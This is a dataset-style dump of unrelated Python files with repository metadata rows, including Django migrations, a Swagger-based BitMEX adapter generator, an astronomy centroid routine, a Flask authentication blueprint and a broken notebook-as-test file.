    with open('./output/segments_raw.geojson', 'w') as outfile:
        geojson.dump(feature_collection_segments, outfile)
    # NOTE(review): DataFrame.size counts cells (rows * columns), not fixes;
    # use len(location) if a row count is intended here.
    print("Processed %d points, finished at %s" % (location.size, str(datetime.datetime.now().time())))
if __name__ == "__main__":
    # Timestamp before main() so runs can be timed against its closing line.
    print ("Processing started at %s" % str(datetime.datetime.now().time()))
    main()
| [
"diegopajarito@gmail.com"
] | diegopajarito@gmail.com |
83c9387d3bb198cf419d2f3ec2dff2bcd9a76c86 | 6209990e3e90f8ca6d0b6cf737b96ad5e9317253 | /my_utils.py | 5b257efb3d417704b07dff888789a21ca633ff42 | [] | no_license | oxnoctisxo/JamGame | cb44e4abc46a19a9e3d4ac67a04d90ee7d979c6d | 3fd5a66ce95dc5ea233201dad7b299d2032517eb | refs/heads/master | 2020-05-01T05:08:25.210226 | 2019-03-24T14:39:29 | 2019-03-24T14:39:29 | 177,293,135 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | from parametters import *
import pygame
| [
"tip.hon@hotmail.fr"
] | tip.hon@hotmail.fr |
bef9b323e645e5c7ef9d02812aa2e7372a98a288 | 1bb98607ddc47884bfe6b2f8e874699e63b528e1 | /main.spec | 98c5705f4febeba77a2fdae29b50d63685420cf2 | [] | no_license | 15011283031/HumanResourcesAss | eacce2c8a165f86c8feef7b5e26b0e8ceb34bc21 | 11e3533335e21dcf770aa60894e3714ba41bcb2c | refs/heads/master | 2021-01-25T09:09:41.548439 | 2018-02-17T07:59:11 | 2018-02-17T07:59:11 | 93,790,201 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 849 | spec | # -*- mode: python -*-
block_cipher = None
a = Analysis(['main.py'],
pathex=['e:\\KM\\GITPROJECT\\HumanResourcesAss'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
exclude_binaries=True,
name='main',
debug=False,
strip=False,
upx=True,
console=True )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
name='main')
| [
"peterchenhra@hotmail.com"
] | peterchenhra@hotmail.com |
3fa9a93f57ccc1bf4090937e244429eb7f71e4a5 | 51386da3c244c1182a4e414ce1401d699c235fa2 | /mainapp/migrations/0003_auto_20210319_2321.py | c763d5a4e92f2019cfaa02b649656a806698e3bc | [] | no_license | bad-us/geekshop | dd134fc47e378d2fc5637b3ad17dfd263429dd0a | e11b9aa3f874eb5ec92b2bbf3e09a463848b120c | refs/heads/Lesson_2 | 2023-07-15T08:45:00.054415 | 2021-08-31T07:57:49 | 2021-08-31T07:57:49 | 393,031,273 | 0 | 0 | null | 2021-08-31T12:05:04 | 2021-08-05T12:19:12 | Python | UTF-8 | Python | false | false | 618 | py | # Generated by Django 3.1.7 on 2021-03-19 20:21
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds an is_active flag (default True) to both Product and
    # ProductCategory so records can be soft-hidden instead of deleted.

    dependencies = [
        ('mainapp', '0002_product'),
    ]

    operations = [
        migrations.AddField(
            model_name='product',
            name='is_active',
            field=models.BooleanField(default=True, verbose_name='активность'),
        ),
        migrations.AddField(
            model_name='productcategory',
            name='is_active',
            field=models.BooleanField(default=True, verbose_name='активность'),
        ),
    ]
| [
"bad-us@rambler.ru"
] | bad-us@rambler.ru |
f666007ac359fe79e9a2e479632c88e69a740821 | f061602595a78bdbdbf32e2dfdcfe623db5b8efd | /graph/migrations/0002_auto__add_field_overviewstat_money.py | 7f104131f6fd659ce917758a30319a93e5f569c5 | [] | no_license | NorbertMichalski/utilities | b9e0643d4b8e0097e0c774d63adbeaa66d3da06b | da27a23add9c42d62ae21a5e74eef920bbd3d839 | refs/heads/master | 2020-05-14T19:04:23.262384 | 2014-01-27T13:45:28 | 2014-01-27T13:45:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,893 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        # Adding field 'OverviewStat.money' (DECIMAL(9,2), default 0);
        # keep_default=False drops the DB-level default after backfilling.
        db.add_column(u'graph_overviewstat', 'money',
                      self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=9, decimal_places=2),
                      keep_default=False)
    def backwards(self, orm):
        # Deleting field 'OverviewStat.money' (reverse of forwards()).
        db.delete_column(u'graph_overviewstat', 'money')
models = {
u'graph.overviewgraph': {
'Meta': {'ordering': "['id']", 'object_name': 'OverviewGraph'},
'brand': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'graph.overviewstat': {
'Meta': {'object_name': 'OverviewStat'},
'date': ('django.db.models.fields.DateField', [], {'default': 'datetime.date.today'}),
'graph': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['graph.OverviewGraph']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'money': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '9', 'decimal_places': '2'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '6', 'decimal_places': '2'}),
'rank': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '5', 'decimal_places': '2'}),
'sales': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'visits': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['graph'] | [
"Norbertmichalski16@gmail.com"
] | Norbertmichalski16@gmail.com |
19fd98493afa75d8472719a61a2fb2a168e3a8e0 | f948811d028d7b4313b38877d383e9920a4fdb25 | /codegen.py | 214594ca7d0334690567a44c8d15bb3f573dbc94 | [] | no_license | silencewwt/Psyduck | fdf8a286dd233fca3c15d7e3ccd9a26e53376c5a | 0635a63941e0e0f342b55367f5a8a8fd12d7e4b6 | refs/heads/master | 2020-03-25T08:19:43.514746 | 2018-08-06T16:37:04 | 2018-08-06T16:37:04 | 143,607,165 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,555 | py | # -*- coding: utf-8 -*-
import json
import re
import click
REGEX = re.compile('((?:[A-Z]?[a-z\d]+)|(?:[A-Z\d]+))')
class Generator(object):
def __init__(self, output, swagger):
self.file = open(output, 'w', encoding='utf-8')
self.indent_level = 0
with open(swagger, mode='r', encoding='utf-8') as fp:
self.swagger = json.load(fp)
def write(self, s):
self.file.write(s)
def writeln(self, s):
self.write(s)
self.newline()
def revert_indent(self, level=1):
self.write('\n\n')
self.indent_level -= level
self.write(' ' * self.indent_level)
def indent(self):
self.write(' ')
self.indent_level += 1
def newline(self):
self.write('\n')
self.write(' ' * self.indent_level)
def flush(self):
self.file.flush()
def close(self):
self.file.close()
def class_begin(self):
self.write('class BitmexAdapter(metaclass=RequestMeta):\n')
self.newline()
self.indent()
self.write_method('__init__', ['client'], [])
self.indent()
self.write('self.client = client')
self.revert_indent()
def write_doc(self, s):
self.writeln('"""')
self.writeln(s)
self.writeln('"""')
def gen(self):
self.file_doc()
self.newline()
self.writeln('from psyduck.client.meta import RequestMeta')
self.newline()
self.newline()
self.class_begin()
for path, detail in self.swagger['paths'].items():
for method, api in detail.items():
self.write_api(api)
self.revert_indent()
self.flush()
self.close()
def file_doc(self):
info = self.swagger['info']
s = '{}\n\n{}'.format(info['title'], info['description'])
self.write_doc(s)
def write_api(self, api):
method = self.get_method_name(api['operationId'])
params = api['parameters']
args = [p['name'] for p in params if p['required']]
kwargs = [p['name'] for p in params if not p['required']]
self.write_method(method, args, kwargs)
self.indent()
self.write_api_doc(api)
self.write_call(api)
self.revert_indent()
def write_method(self, method, args, kwargs):
self.write('def {method}(self'.format(method=method))
if args:
self.write(', ')
self.write(', '.join(map(self.snake_format, args)))
if kwargs:
self.write(', ')
self.write(', '.join(
['{}=None'.format(self.snake_format(k)) for k in kwargs]
))
self.write('):')
self.newline()
def write_api_doc(self, api):
self.writeln('"""')
self.writeln(api['summary'])
self.newline()
for param in api['parameters']:
desc = self.format_param_desc(param.get('description', ''))
self.writeln(
':param {}: {}'.format(self.snake_format(param['name']), desc)
)
self.writeln('"""')
def write_call(self, api):
args = [p['name'] for p in api['parameters']]
tag = api['tags'][0]
method = api['operationId'].replace('.', '_')
self.write(
'return self.client.{tag}.{method}('.format(tag=tag, method=method)
)
self.write(', '.join(['{}={}'.format(
arg, self.snake_format(arg)) for arg in args]
))
self.write(').result()')
def format_param_desc(self, desc):
text = '\n' + ' ' * self.indent_level
return desc.replace('\n\n', text)
@classmethod
def get_method_name(cls, operation_id):
"""Get method name from operation_id
eg:
Order.getOrders -> get_orders
OrderBook.getL2 -> get_order_book_l2
"""
tag, method = operation_id.split('.')
words = re.findall(REGEX, method)
if len(words) > 1 and (tag == words[1] or tag + 's' == words[1]):
return cls.snake_format(''.join(words))
return cls.snake_format(''.join([words[0], tag] + words[1:]))
@classmethod
def snake_format(cls, string):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', string)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
@click.command()
@click.option('--output', '-o')
@click.option('--swagger', '-s')
def generate(output, swagger):
    # CLI entry point: render the adapter for the SWAGGER spec into OUTPUT.
    Generator(output, swagger).gen()
if __name__ == '__main__':
    generate()
| [
"silencewwt@gmail.com"
] | silencewwt@gmail.com |
3cd9816aa15459e15cbade31bc4234a1e433e840 | bc84258382756f5a2e1382813ce68f6148acc33a | /cntrd.py | 0444e1056807de47433cc38ceda157eea2bf8888 | [
"MIT"
] | permissive | dragozzine/hstfakes | 6604978c4a78a19936c3e5192b3917558b2d7f67 | a73971686a9189106b0e6a8039e581f649a1acf0 | refs/heads/master | 2021-05-28T08:57:41.402475 | 2014-07-24T17:41:49 | 2014-07-24T17:41:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,657 | py | #!/usr/bin/env python
# D. Jones - 2/13/14
"""This code is from the IDL Astronomy Users Library"""
import numpy as np
def cntrd(img, x, y,
          fwhm, silent=False,
          debug=False,
          extendbox = False,
          keepcenter = False):
    """;+
    ; NAME:
    ;       CNTRD
    ; PURPOSE:
    ;       Compute the centroid  of a star using a derivative search
    ; EXPLANATION:
    ;       CNTRD uses an early DAOPHOT "FIND" centroid algorithm by locating the
    ;       position where the X and Y derivatives go to zero.   This is usually a
    ;       more "robust"  determination than a "center of mass" or fitting a 2d
    ;       Gaussian  if the wings in one direction are affected by the presence
    ;       of a neighboring star.
    ;
    ; CALLING SEQUENCE:
    ;       CNTRD, img, x, y, xcen, ycen, [ fwhm , /KEEPCENTER, /SILENT, /DEBUG
    ;                                       EXTENDBOX = ]
    ;
    ; INPUTS:
    ;       IMG - Two dimensional image array
    ;       X,Y - Scalar or vector integers giving approximate integer stellar
    ;             center
    ;
    ; OPTIONAL INPUT:
    ;       FWHM - floating scalar; Centroid is computed using a box of half
    ;               width equal to 1.5 sigma = 0.637* FWHM.  CNTRD will prompt
    ;               for FWHM if not supplied
    ;
    ; OUTPUTS:
    ;       XCEN - the computed X centroid position, same number of points as X
    ;       YCEN - computed Y centroid position, same number of points as Y,
    ;              floating point
    ;
    ;       Values for XCEN and YCEN will not be computed if the computed
    ;       centroid falls outside of the box, or if the computed derivatives
    ;       are non-decreasing.   If the centroid cannot be computed, then a
    ;       message is displayed and XCEN and YCEN are set to -1.
    ;
    ; OPTIONAL OUTPUT KEYWORDS:
    ;       /SILENT - Normally CNTRD prints an error message if it is unable
    ;               to compute the centroid.   Set /SILENT to suppress this.
    ;       /DEBUG - If this keyword is set, then CNTRD will display the subarray
    ;               it is using to compute the centroid.
    ;       EXTENDBOX = {non-negative positive integer}.   CNTRD searches a box with
    ;              a half width equal to 1.5 sigma  = 0.637* FWHM to find the
    ;              maximum pixel.    To search a larger area, set EXTENDBOX to
    ;              the number of pixels to enlarge the half-width of the box.
    ;              Default is 0; prior to June 2004, the default was EXTENDBOX= 3
    ;       /KeepCenter = By default, CNTRD finds the maximum pixel in a box
    ;              centered on the input X,Y coordinates, and then extracts a new
    ;              box about this maximum pixel.   Set the /KeepCenter keyword
    ;              to skip then step of finding the maximum pixel, and instead use
    ;              a box centered on the input X,Y coordinates.
    ; PROCEDURE:
    ;       Maximum pixel within distance from input pixel X, Y  determined
    ;       from FHWM is found and used as the center of a square, within
    ;       which the centroid is computed as the value (XCEN,YCEN) at which
    ;       the derivatives of the partial sums of the input image over (y,x)
    ;       with respect to (x,y) = 0.    In order to minimize contamination from
    ;       neighboring stars stars, a weighting factor W is defined as unity in
    ;       center, 0.5 at end, and linear in between
    ;
    ; RESTRICTIONS:
    ;       (1) Does not recognize (bad) pixels.   Use the procedure GCNTRD.PRO
    ;           in this situation.
    ;       (2) DAOPHOT now uses a newer algorithm (implemented in GCNTRD.PRO) in
    ;           which centroids are determined by fitting 1-d Gaussians to the
    ;           marginal distributions in the X and Y directions.
    ;       (3) The default behavior of CNTRD changed in June 2004 (from EXTENDBOX=3
    ;           to EXTENDBOX = 0).
    ;       (4) Stone (1989, AJ, 97, 1227) concludes that the derivative search
    ;           algorithm in CNTRD is not as effective (though faster) as a
    ;           Gaussian fit (used in GCNTRD.PRO).
    ; MODIFICATION HISTORY:
    ;       Written 2/25/86, by J. K. Hill, S.A.S.C., following
    ;       algorithm used by P. Stetson in DAOPHOT.
    ;       Allowed input vectors        G. Hennessy       April,  1992
    ;       Fixed to prevent wrong answer if floating pt. X & Y supplied
    ;               W. Landsman        March, 1993
    ;       Convert byte, integer subimages to float  W. Landsman  May 1995
    ;       Converted to IDL V5.0   W. Landsman   September 1997
    ;       Better checking of edge of frame David Hogg October 2000
    ;       Avoid integer wraparound for unsigned arrays W.Landsman January 2001
    ;       Handle case where more than 1 pixel has maximum value W.L. July 2002
    ;       Added /KEEPCENTER, EXTENDBOX (with default = 0) keywords WL June 2004
    ;       Some errrors were returning X,Y = NaN rather than -1,-1  WL Aug 2010
    ;- """

    sz_image = np.shape(img)
    xsize = sz_image[1]
    ysize = sz_image[0]

    # Compute size of box needed to compute centroid
    if not extendbox: extendbox = 0
    nhalf = int(0.637*fwhm)
    if nhalf < 2: nhalf = 2
    nbox = 2*nhalf+1  # Width of box to be used to compute centroid
    nhalfbig = nhalf + extendbox
    nbig = nbox + extendbox*2  # Extend box EXTENDBOX pixels on each side to search for max pixel value

    # Bugfix: the original scalar test `type(x) == np.float` raises
    # AttributeError on numpy >= 1.24 (the np.float alias was removed) and
    # misses numpy scalar types; np.ndim() handles python scalars, numpy
    # scalars, and sequences uniformly.
    if np.ndim(x) == 0: npts = 1
    else: npts = len(x)

    if npts == 1: xcen = float(x) ; ycen = float(y)
    else: xcen = x.astype(float) ; ycen = y.astype(float)
    ix = np.round( x )          # Central X pixel  ;Added 3/93
    iy = np.round( y )          # Central Y pixel

    if npts == 1: x,y,ix,iy,xcen,ycen = [x],[y],[ix],[iy],[xcen],[ycen]
    for i in range(npts):        # Loop over X,Y vector
        pos = str(x[i]) + ' ' + str(y[i])

        if not keepcenter:
            # Reject positions whose search box would fall off the image.
            if ( (ix[i] < nhalfbig) or ((ix[i] + nhalfbig) > xsize-1) or \
                 (iy[i] < nhalfbig) or ((iy[i] + nhalfbig) > ysize-1) ):
                if not silent:
                    print('Position '+ pos + ' too near edge of image')
                xcen[i] = -1 ; ycen[i] = -1
                continue

            bigbox = img[int(iy[i]-nhalfbig) : int(iy[i]+nhalfbig+1), int(ix[i]-nhalfbig) : int(ix[i]+nhalfbig+1)]

            # Locate maximum pixel in 'NBIG' sized subimage
            goodrow = np.where(bigbox == bigbox)
            mx = np.max( bigbox[goodrow])  # Maximum pixel value in BIGBOX

            mx_pos = np.where(bigbox.reshape(np.shape(bigbox)[0]*np.shape(bigbox)[1]) == mx)[0]  # How many pixels have maximum value?
            Nmax = len(mx_pos)
            idx = mx_pos % nbig   # X coordinate of Max pixel
            # Bugfix: must be floor division.  Under Python 3 the original
            # `mx_pos / nbig` performed true division, producing a fractional
            # row index that silently shifted the computed Y centroid.
            idy = mx_pos // nbig  # Y coordinate of Max pixel
            if Nmax > 1:          # More than 1 pixel at maximum?
                idx = np.round(np.sum(idx)/Nmax)
                idy = np.round(np.sum(idy)/Nmax)
            else:
                idx = idx[0]
                idy = idy[0]

            xmax = ix[i] - (nhalf+extendbox) + idx  # X coordinate in original image array
            ymax = iy[i] - (nhalf+extendbox) + idy  # Y coordinate in original image array
        else:
            xmax = ix[i]
            ymax = iy[i]

        # ---------------------------------------------------------------------
        # check *new* center location for range (added by Hogg)
        if ( (xmax < nhalf) or ((xmax + nhalf) > xsize-1) or \
             (ymax < nhalf) or ((ymax + nhalf) > ysize-1) ):
            if not silent:
                print('Position '+ pos + ' moved too near edge of image')
            xcen[i] = -1 ; ycen[i] = -1
            continue
        # ---------------------------------------------------------------------

        # Extract smaller 'STRBOX' sized subimage centered on maximum pixel
        strbox = img[int(ymax-nhalf) : int(ymax+nhalf+1), int(xmax-nhalf) : int(xmax+nhalf+1)]

        if debug:
            print('Subarray used to compute centroid:')
            print(strbox)

        ir = (nhalf-1)
        if ir < 1: ir = 1
        dd = np.arange(nbox-1).astype(int) + 0.5 - nhalf
        # Weighting factor W unity in center, 0.5 at end, and linear in between
        w = 1. - 0.5*(np.abs(dd)-0.5)/(nhalf-0.5)
        sumc = np.sum(w)

        # Find X centroid
        deriv = np.roll(strbox,-1,axis=1) - strbox  # Shift in X & subtract to get derivative
        deriv = deriv[nhalf-ir:nhalf+ir+1,0:nbox-1] # Don't want edges of the array
        deriv = np.sum( deriv, 0 )                  # Sum X derivatives over Y direction
        sumd = np.sum( w*deriv )
        sumxd = np.sum( w*dd*deriv )
        sumxsq = np.sum( w*dd**2 )

        if sumxd >= 0:  # Reject if X derivative not decreasing
            if not silent:
                print('Unable to compute X centroid around position '+ pos)
            xcen[i]=-1 ; ycen[i]=-1
            continue

        dx = sumxsq*sumd/(sumc*sumxd)
        if ( np.abs(dx) > nhalf ):  # Reject if centroid outside box
            if not silent:
                print('Computed X centroid for position '+ pos + ' out of range')
            xcen[i]=-1 ; ycen[i]=-1
            continue

        xcen[i] = xmax - dx  # X centroid in original array

        # Find Y Centroid
        deriv = np.roll(strbox,-1,axis=0) - strbox  # Shift in Y & subtract to get derivative
        deriv = deriv[0:nbox-1,nhalf-ir:nhalf+ir+1]
        deriv = np.sum( deriv,1 )
        sumd = np.sum( w*deriv )
        sumxd = np.sum( w*deriv*dd )
        sumxsq = np.sum( w*dd**2 )

        if (sumxd >= 0):  # Reject if Y derivative not decreasing
            if not silent:
                print('Unable to compute Y centroid around position '+ pos)
            xcen[i] = -1 ; ycen[i] = -1
            continue

        dy = sumxsq*sumd/(sumc*sumxd)
        if (np.abs(dy) > nhalf):  # Reject if computed Y centroid outside box
            if not silent:
                # Bugfix: this message previously said "X centroid".
                print('Computed Y centroid for position '+ pos + ' out of range')
            xcen[i]=-1 ; ycen[i]=-1
            continue

        ycen[i] = ymax-dy

    if npts == 1: xcen,ycen = xcen[0],ycen[0]

    return(xcen,ycen)
| [
"steve.rodney@gmail.com"
] | steve.rodney@gmail.com |
758e384b3a6911b45061fc77173d87ce769d5074 | e8775c4c2df37b87cf1581d258310084d74b01f3 | /contribucion.py | ca163d5ae42d3cae74e0800d235ee7e5a232ae9b | [] | no_license | Gabospa/OOPexample | 1b547aed215cb73f1bf5c1fe2c8c1fcf54ac80d9 | 1c7d584a10623db593ee849a600d7ce430050f4d | refs/heads/master | 2022-11-25T04:48:51.325169 | 2020-07-31T16:18:13 | 2020-07-31T16:18:13 | 282,141,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | class Contribucion:
""" Clase Contribución """
    def __init__(self, idNum, titulo , idAutor , calificacion):
        # Store the contribution's id, title, author id and rating in
        # "private" attributes exposed through the properties below.
        self._idNum = idNum
        self._titulo = titulo
        self._idAutor = idAutor
        self._calificacion = calificacion
    # idNum getter
    @property
    def idNum(self):
        return self._idNum
    # idNum setter
    # NOTE(review): the setter method is named 'set_id' instead of 'idNum', so
    # this actually creates a *separate* 'set_id' property rather than making
    # 'idNum' writable; assigning to obj.idNum raises AttributeError. Confirm
    # whether this naming is intentional before relying on it.
    @idNum.setter
    def set_id(self, idNum):
        self._idNum = idNum
    # titulo getter
    @property
    def titulo(self):
        return self._titulo
    # titulo setter
    # NOTE(review): named 'set_titulo' rather than 'titulo', so 'titulo' stays
    # read-only and a separate 'set_titulo' property is created instead.
    # Confirm intent (see the matching pattern on set_id above... same issue).
    @titulo.setter
    def set_titulo(self, titulo):
        self._titulo = titulo
#calificación getter
@property
def calificacion(self):
return self._calificacion
#calificación setter
@titulo.setter
def set_calificacion(self, calificacion):
self._calificacion = calificacion
    # actualizarAutor updates the contribution's author to the id given in the
    # 'nuevoAutor' (new author) parameter.
    def actualizarAutor(self, nuevoAutor):
        self._idAutor = nuevoAutor
"gabospa@gmail.com"
] | gabospa@gmail.com |
a4d8f83509a7a69fa49cef14a93d2cb7220dbe9d | 2c5de2a2748a4418800a0aceff2444e1c3a8d72d | /ilsp/common/auth.py | 25b29000eae9bd6138d713cc0af7ba4547c859d9 | [] | no_license | fmfi/infolist-editor | 9fbd60139e03c06ed465452faf8ff7b7c5e48f6d | 4aa613fac74e4648f2640f8a086e7953296d56fc | refs/heads/master | 2021-01-13T02:06:37.745620 | 2018-02-19T09:54:51 | 2018-02-19T09:54:51 | 13,423,385 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,198 | py | from functools import wraps
import os
from flask import Blueprint, request, redirect, Response, render_template, current_app, url_for, g, abort
from itsdangerous import URLSafeSerializer
blueprint = Blueprint('auth', __name__)
@blueprint.before_app_request
def before_request():
  """Resolve the current user before each request and stash it on flask.g.

  The username comes from the web server's REMOTE_USER; in debug mode it may
  be overridden through the REMOTE_USER environment variable for local
  development.
  """
  if current_app.debug and 'REMOTE_USER' in os.environ:
    username = os.environ['REMOTE_USER']
  else:
    username = request.remote_user
  g.username = username
  g.user = g.db.load_user(username)
def login_get_next_url():
  """Decode the signed 'next' redirect target from the query string.

  :return: tuple ``(absolute_url, signed_token)``, or ``(None, None)`` when
    the parameter is missing or its signature fails verification.
  """
  if 'next' not in request.args:
    return None, None
  try:
    serializer = URLSafeSerializer(current_app.secret_key)
    goto_encrypted = request.args['next']
    goto = serializer.loads(goto_encrypted)
    goto = request.url_root + goto
    return goto, goto_encrypted
  except Exception:
    # Bugfix: narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
    # are no longer swallowed; a tampered or stale token still lands here and
    # is treated the same as a missing parameter.
    return None, None
@blueprint.route('/login')
def login():
  """Post-login landing page: bounce the user to the verified 'next' URL.

  Falls back to the index page when no valid 'next' parameter was supplied.
  """
  url, _token = login_get_next_url()
  return redirect(url if url else url_for('index'))
@blueprint.route('/logout')
def logout():
  """Log out: expire the cosign service cookie and redirect to the SSO logout."""
  logout_target = 'https://login.uniba.sk/logout.cgi?{}'.format(url_for('index', _external=True))
  response = current_app.make_response(redirect(logout_target))
  cosign_service = request.environ.get('COSIGN_SERVICE')
  if cosign_service is not None:
    # Expire the cosign session cookie so the browser drops it immediately.
    response.set_cookie(cosign_service, value='', expires=1, path='/', secure=True)
  return response
@blueprint.route('/ping')
def ping():
  # Empty 200 response; presumably polled (via ping.js) as a session
  # keep-alive — confirm against the template's usage.
  return ''
@blueprint.route('/ping.js')
def ping_js():
  # Serve the rendered ping script with an explicit JavaScript content type.
  return Response(render_template('ping.js'), mimetype='text/javascript')
def restrict(api=False):
  """Decorator factory that restricts a view to authenticated users.

  :param api: when True, unauthenticated requests get a bare HTTP 401;
    otherwise the client is redirected to the login flow carrying a signed
    'next' token so it can return to the originally requested page.
  """
  def decorator(f):
    @wraps(f)
    def wrapper(*args, **kwargs):
      if not g.user:
        if api:
          abort(401)
        else:
          if g.username:
            # Authenticated at the SSO level but unknown to the application
            # database: show an "unauthorized" page instead of re-login.
            return render_template('unauthorized.html'), 401
          goto = None
          # Only safe, replayable methods get a return-to target.
          if request.method in ['HEAD', 'GET']:
            if request.url.startswith(request.url_root):
              goto = request.url[len(request.url_root):]
            # Sign the relative path so it cannot be tampered with.
            # NOTE(review): when the URL does not start with url_root, goto
            # stays None and dumps(None) is signed — confirm this is intended.
            serializer = URLSafeSerializer(current_app.secret_key)
            goto = serializer.dumps(goto)
          return redirect(url_for('index', next=goto))
      return f(*args, **kwargs)
    return wrapper
  return decorator
"martin.sucha@fmph.uniba.sk"
] | martin.sucha@fmph.uniba.sk |
0e20409c8fcd44abf8a545914efe38451ae3111a | 748133ddbca64674b0a1c3f3453f1abf1b3e8523 | /Biof309_project/modules/.ipynb_checkpoints/test_Clearnulls-checkpoint.py | 5224baf6fd465d560f9437a089b6f4149fcbae33 | [] | no_license | sarahfa-por/Biof309 | 2043a55a56117b5e68c62e730c074cb6b19479a6 | a586a6d6fd7142a8c93283dd1c406210d5ea0af1 | refs/heads/master | 2020-10-01T23:13:23.819511 | 2019-12-12T23:07:40 | 2019-12-12T23:07:40 | 227,643,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,064 | py | {
"cells": [
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'null' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-10-6aa3da78a74a>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 3\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 4\u001b[0m \u001b[0;32mimport\u001b[0m \u001b[0mpytest\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 5\u001b[0;31m \u001b[0;32mfrom\u001b[0m \u001b[0mmodules\u001b[0m \u001b[0;32mimport\u001b[0m \u001b[0mClearnulls\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 6\u001b[0m \u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0;32mdef\u001b[0m \u001b[0mtest_for_nulls\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m:\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;32m~/Documents/VDJ_Analysis/modules/Clearnulls.py\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[1;32m 3\u001b[0m {\n\u001b[1;32m 4\u001b[0m \u001b[0;34m\"cell_type\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0;34m\"code\"\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0;32m----> 5\u001b[0;31m \u001b[0;34m\"execution_count\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0mnull\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 6\u001b[0m \u001b[0;34m\"metadata\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0;34m{\u001b[0m\u001b[0;34m}\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 7\u001b[0m \u001b[0;34m\"outputs\"\u001b[0m\u001b[0;34m:\u001b[0m \u001b[0;34m[\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m,\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n",
"\u001b[0;31mNameError\u001b[0m: name 'null' is not defined"
]
}
],
"source": [
"import sys\n",
"sys.path.append('/Documents/VDJ_Analysis')\n",
"\n",
"import pytest\n",
"import Clearnulls\n",
"\n",
"def test_for_nulls():\n",
" assert Clearnulls(df, 'cdr3').isnull().all()\n"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.3"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| [
"sarah.andrews2@nih.gov"
] | sarah.andrews2@nih.gov |
d90b17e4a307a458615f340144ef6ae834bd9bd4 | 4dbf96a46d754e79d3e4893dbef036acab2c19a2 | /config/settings.py | d8fdd70facf0d49e07547534682cc46058548f38 | [] | no_license | noellehamberis/fullstack-newsapp | 0c2536698ca22ea91d30e5c31e08874de8c86b29 | 7d6769c5b100b39093ebff23c6fe4ed5dc35fc8a | refs/heads/main | 2023-01-04T11:53:24.555522 | 2020-10-30T20:41:49 | 2020-10-30T20:41:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,307 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
import dj_database_url
from pathlib import Path
